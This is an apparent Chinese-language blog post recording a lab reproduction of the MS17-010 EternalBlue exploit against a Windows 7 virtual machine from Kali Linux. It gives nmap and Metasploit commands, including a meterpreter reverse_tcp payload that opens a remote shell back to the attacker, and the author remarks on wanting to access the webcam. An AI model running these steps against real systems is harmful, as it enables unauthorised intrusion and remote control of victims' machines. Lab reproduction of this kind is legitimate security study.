参考:
https://blog.csdn.net/n5xxxx__zy/article/details/90705057
目标ip:192.168.91.149
攻击机:192.168.91.146
目标系统:win7
攻击机:kail
准备工作:
目标机:win7开启网络共享:控制面板-网络和共享中心-更改高级共享设置-启用网络发现-关闭密码保护共享-保存修改
攻击机:开启postgresql
开启postgresql:
先查看当前postgresql状态:
service postgresql status
将其开启:
service postgresql start
使用nmap扫描一下收集信息
nmap -sS 192.168.91.149
发现445端口开启(445端口就是网络共享端口),可以进行下一步
打开msf,先搜索一下漏洞模块:
search ms17-010
然后使用辅助模块:
use auxiliary/scanner/smb/smb_ms17_010
设置payload:set payload windows/x64/meterpreter/reverse_tcp
要选用其他payload可以使用show payloads查看适合要攻击的目标主机的payload
show options
set RHOST 目标主机地址
set LHOST 攻击机地址
set LPORT
回连的端口 :该命令设置目标主机回连至攻击机的端口,默认为4444
run:开始攻击(使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue)
我这个win7太菜了,还没等我进一步探索,弄点摄像头什么的,它就崩了,不管怎么说,复现完毕
4134
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
